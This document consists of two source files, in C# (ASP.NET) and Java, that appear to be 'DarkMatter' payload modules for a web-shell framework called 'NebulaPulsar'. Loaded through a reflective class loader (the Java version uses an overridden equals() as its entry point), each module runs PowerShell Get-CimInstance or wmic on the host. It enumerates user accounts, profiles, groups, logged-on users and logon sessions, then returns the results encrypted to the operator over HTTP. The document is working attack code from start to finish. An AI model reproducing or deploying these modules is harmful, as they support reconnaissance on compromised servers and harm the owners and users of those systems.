File: Payload/ASPX/NebulaPulsar/DarkMatter/win_user.cs
using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Threading;
using System.Text.RegularExpressions;

public class win_users
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam))
            return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }

        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
        byte[] abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] {abOutput, 1});

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.BinaryWrite(abEncryptedResp);
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
            return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object driver = context.Items["driver"];
            int nDllLength = (int)context.Items["len"];

            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();
            Dictionary<string, string> dic = fnParseParams(szParam);

            StringBuilder sb = new StringBuilder();
            
            Dictionary<string, object> result = new Dictionary<string, object>();
            result["success"] = false;
            result["error"] = "";
            result["data"] = null;

            try
            {
                Dictionary<string, object> data = new Dictionary<string, object>();
                data["user_accounts"] = fnGetData("Get-CimInstance Win32_UserAccount | Format-List *", "Win32_UserAccount");
                data["user_profiles"] = fnGetData("Get-CimInstance Win32_UserProfile | Format-List *", "Win32_UserProfile");
                data["groups"] = fnGetData("Get-CimInstance Win32_Group | Format-List *", "Win32_Group");
                data["group_users"] = fnGetData("Get-CimInstance Win32_GroupUser | Format-List *", "Win32_GroupUser");
                data["logged_on"] = fnGetData("Get-CimInstance Win32_LoggedOnUser | Format-List *", "Win32_LoggedOnUser");
                data["logon_session"] = fnGetData("Get-CimInstance Win32_LogonSession | Format-List *", "Win32_LogonSession");

                result["data"] = data;
                result["success"] = true;
            }
            catch (Exception ex)
            {
                result["error"] = ex.Message;
            }

            sb.Append(fnToJson(result, 0));

            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(sb.ToString()));

        }
        catch (Exception ex)
        {
            response.Write("DARKMATTER_ERROR: " + ex.Message);
        }

        return true;
    }

    private bool fnHasPowerShell()
    {
        try
        {
            ProcessStartInfo psi = new ProcessStartInfo("powershell", "-NoProfile -Command \"Get-Host\"")
            {
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true
            };
            using (Process proc = Process.Start(psi))
            {
                proc.WaitForExit();
                return proc.ExitCode == 0;
            }
        }
        catch (Exception)
        {
            return false;
        }
    }

    private string fnCleanValue(string v)
    {
        if (v == null)
            return "";

        return Regex.Replace(v, @"[\p{C}&&[^\s]]", "").Trim();
    }

    private List<Dictionary<string, string>> fnGetData(string psQuery, string wmicClass)
    {
        if (fnHasPowerShell())
        {
            List<Dictionary<string, string>> psData = fnRunPowerShell(psQuery);
            if (psData != null && psData.Count > 0)
            {
                return psData;
            }
        }
        return fnParseWMIC(wmicClass);
    }

    private List<Dictionary<string, string>> fnRunPowerShell(string query)
    {
        List<Dictionary<string, string>> rows = new List<Dictionary<string, string>>();
        Dictionary<string, string> current = new Dictionary<string, string>();

        try
        {
            ProcessStartInfo psi = new ProcessStartInfo("powershell", "-NoProfile -Command \"" + query + "\"")
            {
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true,
                StandardOutputEncoding = Encoding.UTF8
            };

            using (Process process = Process.Start(psi))
            {
                using (StreamReader reader = process.StandardOutput)
                {
                    string line;
                    while ((line = reader.ReadLine()) != null)
                    {
                        line = line.Replace("\uFEFF", "").Trim();

                        if (string.IsNullOrEmpty(line))
                        {
                            if (current.Count > 0)
                            {
                                rows.Add(new Dictionary<string, string>(current));
                                current.Clear();
                            }
                            continue;
                        }

                        if (!line.Contains(":"))
                        {
                            continue;
                        }

                        int partsIdx = line.IndexOf(':');
                        string k = fnCleanValue(line.Substring(0, partsIdx));
                        string v = fnCleanValue(line.Substring(partsIdx + 1));

                        if (string.IsNullOrEmpty(k)) continue;
                        current[k] = v;
                    }
                }
                if (current.Count > 0)
                {
                    rows.Add(new Dictionary<string, string>(current));
                }
                process.WaitForExit();
            }
        }
        catch (Exception)
        {
            return new List<Dictionary<string, string>>();
        }
        return rows;
    }

    private List<Dictionary<string, string>> fnParseWMIC(string wmicClass)
    {
        List<Dictionary<string, string>> rows = new List<Dictionary<string, string>>();
        Dictionary<string, string> current = new Dictionary<string, string>();

        try
        {
            ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", string.Format("/c wmic path {0} get /format:list", wmicClass))
            {
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true,
                StandardOutputEncoding = Encoding.GetEncoding(950)
            };

            using (Process process = Process.Start(psi))
            {
                using (StreamReader reader = process.StandardOutput)
                {
                    string line;
                    while ((line = reader.ReadLine()) != null)
                    {
                        line = line.Replace("\uFEFF", "").Trim();

                        if (string.IsNullOrEmpty(line))
                        {
                            if (current.Count > 0)
                            {
                                rows.Add(new Dictionary<string, string>(current));
                                current.Clear();
                            }
                            continue;
                        }

                        if (!line.Contains("="))
                        {
                            continue;
                        }

                        int partsIdx = line.IndexOf('=');
                        string k = fnCleanValue(line.Substring(0, partsIdx));
                        string v = fnCleanValue(line.Substring(partsIdx + 1));

                        if (string.IsNullOrEmpty(k)) continue;
                        current[k] = v;
                    }
                }

                if (current.Count > 0)
                {
                    rows.Add(new Dictionary<string, string>(current));
                }
                process.WaitForExit();
            }
        }
        catch (Exception)
        {
            return new List<Dictionary<string, string>>();
        }
        return rows;
    }

    private string fnToJson(object obj, int indentLevel)
    {
        string indent = new string(' ', indentLevel * 2);
        string nextIndent = new string(' ', (indentLevel + 1) * 2);

        if (obj == null)
        {
            return "null";
        }
        if (obj is bool)
        {
            return obj.ToString().ToLower();
        }
        if (obj is string)
        {
            return "\"" + fnEscapeJsonString((string)obj) + "\"";
        }
        if (obj is System.Collections.IDictionary)
        {
            System.Collections.IDictionary map = (System.Collections.IDictionary)obj;
            if (map.Count == 0) return "{}";

            StringBuilder sb = new StringBuilder("{\n");
            var it = map.GetEnumerator();
            bool isFirst = true;

            while (it.MoveNext())
            {
                if (!isFirst)
                {
                    sb.Append(",\n");
                }
                isFirst = false;
                sb.Append(nextIndent)
                  .Append("\"").Append(fnEscapeJsonString(it.Key.ToString())).Append("\": ")
                  .Append(fnToJson(it.Value, indentLevel + 1));
            }
            sb.Append("\n").Append(indent).Append("}");
            return sb.ToString();
        }
        if (obj is System.Collections.IList)
        {
            System.Collections.IList list = (System.Collections.IList)obj;
            if (list.Count == 0) return "[]";

            StringBuilder sb = new StringBuilder("[\n");
            for (int i = 0; i < list.Count; i++)
            {
                sb.Append(nextIndent).Append(fnToJson(list[i], indentLevel + 1));
                if (i < list.Count - 1)
                {
                    sb.Append(",");
                }
                sb.Append("\n");
            }
            sb.Append(indent).Append("]");
            return sb.ToString();
        }

        return "\"" + fnEscapeJsonString(obj.ToString()) + "\"";
    }

    private string fnEscapeJsonString(string str)
    {
        if (str == null) return "";
        return str.Replace("\\", "\\\\")
                  .Replace("\"", "\\\"")
                  .Replace("\b", "\\b")
                  .Replace("\f", "\\f")
                  .Replace("\n", "\\n")
                  .Replace("\r", "\\r")
                  .Replace("\t", "\\t");
    }
}

File: Payload/CFM/NebulaPulsar/DarkMatter/win_user.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.util.*;
public class win_user extends ClassLoader
{
    public win_user(ClassLoader objParent) { super(objParent); }
    public win_user() { super(win_user.class.getClassLoader()); }

    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored)
        {

        }
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;

        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);
            String szSplitter = mapParams.get("splitter");
            StringBuffer sb = new StringBuffer();

            Map<String, Object> result = new LinkedHashMap<>();
            result.put("success", false);
            result.put("error", "");
            result.put("data", null);

            try
            {
                Map<String, List<Map<String, String>>> data = new LinkedHashMap<>();
                data.put("user_accounts", fnGetData("Get-CimInstance Win32_UserAccount | Format-List *", "Win32_UserAccount"));
                data.put("user_profiles", fnGetData("Get-CimInstance Win32_UserProfile | Format-List *", "Win32_UserProfile"));
                data.put("groups",         fnGetData("Get-CimInstance Win32_Group | Format-List *", "Win32_Group"));
                data.put("group_users",    fnGetData("Get-CimInstance Win32_GroupUser | Format-List *", "Win32_GroupUser"));
                data.put("logged_on",     fnGetData("Get-CimInstance Win32_LoggedOnUser | Format-List *", "Win32_LoggedOnUser"));
                data.put("logon_session", fnGetData("Get-CimInstance Win32_LogonSession | Format-List *", "Win32_LogonSession"));

                result.put("data", data);
                result.put("success", true);
            }
            catch (Exception ex)
            {
                result.put("error", ex.getMessage());
            }

            sb.append(fnToJson(result, 0));

            fnWriteOutput(objParam, objResponse, osClient, sb.toString().getBytes());
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));

                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) {}
            }
        }

        return true;
    }

    private boolean fnHasPowerShell()
    {
        try
        {
            Process proc = new ProcessBuilder("powershell", "-Command", "\"Get-Host\"").start();
            return proc.waitFor() == 0;
        }
        catch (Exception ex)
        {
            return false;
        }
    }

    private String fnCleanValue(String v)
    {
        if (v == null)
            return "";

        return v.replaceAll("[\\p{Cntrl}&&[^\\s]]", "").trim();
    }

    private List<Map<String, String>> fnGetData(String psQuery, String wmicClass) {
        if (fnHasPowerShell()) {
            List<Map<String, String>> psData = fnRunPowerShell(psQuery);
            if (!psData.isEmpty()) {
                return psData;
            }
        }
        return fnParseWMIC(wmicClass);
    }

    private List<Map<String, String>> fnRunPowerShell(String query) {
        List<Map<String, String>> rows = new ArrayList<>();
        Map<String, String> current = new TreeMap<>();

        try {
            ProcessBuilder pb = new ProcessBuilder("powershell", "-NoProfile", "-Command", query);
            Process process = pb.start();

            try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8))) {
                String line;
                while ((line = reader.readLine()) != null) {
                    line = line.replace("\uFEFF", "").trim();

                    if (line.isEmpty()) {
                        if (!current.isEmpty()) {
                            rows.add(new LinkedHashMap<>(current));
                            current.clear();
                        }
                        continue;
                    }

                    if (!line.contains(":")) {
                        continue;
                    }

                    String[] parts = line.split(":", 2);
                    String k = fnCleanValue(parts[0]);
                    String v = parts.length > 1 ? fnCleanValue(parts[1]) : "";

                    if (k.isEmpty()) continue;
                    current.put(k, v);
                }
            }
            if (!current.isEmpty()) {
                rows.add(new LinkedHashMap<>(current));
            }
            process.waitFor();
        } catch (Exception e) {
            return Collections.emptyList();
        }
        return rows;
    }

    private List<Map<String, String>> fnParseWMIC(String wmicClass) {
        List<Map<String, String>> rows = new ArrayList<>();
        Map<String, String> current = new TreeMap<>();

        try {
            ProcessBuilder pb = new ProcessBuilder("cmd.exe", "/c", String.format("wmic path %s get /format:list", wmicClass));
            Process process = pb.start();

            try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream(), "MS950"))) {
                String line;
                while ((line = reader.readLine()) != null) {
                    line = line.replace("\uFEFF", "").trim();

                    if (line.isEmpty()) {
                        if (!current.isEmpty()) {
                            rows.add(new LinkedHashMap<>(current));
                            current.clear();
                        }
                        continue;
                    }

                    if (!line.contains("=")) {
                        continue;
                    }

                    String[] parts = line.split("=", 2);
                    String k = fnCleanValue(parts[0]);
                    String v = parts.length > 1 ? fnCleanValue(parts[1]) : "";

                    if (k.isEmpty()) continue;
                    current.put(k, v);
                }
            }

            if (!current.isEmpty()) {
                rows.add(new LinkedHashMap<>(current));
            }
            process.waitFor();
        } catch (Exception e) {
            return Collections.emptyList();
        }
        return rows;
    }

    private String fnToJson(Object obj, int indentLevel) {
        String indent = "  ".repeat(indentLevel);
        String nextIndent = "  ".repeat(indentLevel + 1);

        if (obj == null) {
            return "null";
        }
        if (obj instanceof Boolean) {
            return obj.toString();
        }
        if (obj instanceof String) {
            return "\"" + fnEscapeJsonString((String) obj) + "\"";
        }
        if (obj instanceof Map) {
            Map<?, ?> map = (Map<?, ?>) obj;
            if (map.isEmpty()) return "{}";
            
            StringBuilder sb = new StringBuilder("{\n");
            Iterator<? extends Map.Entry<?, ?>> it = map.entrySet().iterator();
            while (it.hasNext()) {
                Map.Entry<?, ?> entry = it.next();
                sb.append(nextIndent)
                  .append("\"").append(fnEscapeJsonString(entry.getKey().toString())).append("\": ")
                  .append(fnToJson(entry.getValue(), indentLevel + 1));
                if (it.hasNext()) {
                    sb.append(",");
                }
                sb.append("\n");
            }
            sb.append(indent).append("}");
            return sb.toString();
        }
        if (obj instanceof List) {
            List<?> list = (List<?>) obj;
            if (list.isEmpty()) return "[]";

            StringBuilder sb = new StringBuilder("[\n");
            Iterator<?> it = list.iterator();
            while (it.hasNext()) {
                Object item = it.next();
                sb.append(nextIndent).append(fnToJson(item, indentLevel + 1));
                if (it.hasNext()) {
                    sb.append(",");
                }
                sb.append("\n");
            }
            sb.append(indent).append("]");
            return sb.toString();
        }

        return "\"" + fnEscapeJsonString(obj.toString()) + "\"";
    }

    private String fnEscapeJsonString(String str) {
        if (str == null) return "";
        return str.replace("\\", "\\\\")
                  .replace("\"", "\\\"")
                  .replace("\b", "\\b")
                  .replace("\f", "\\f")
                  .replace("\n", "\\n")
                  .replace("\r", "\\r")
                  .replace("\t", "\\t");
    }
}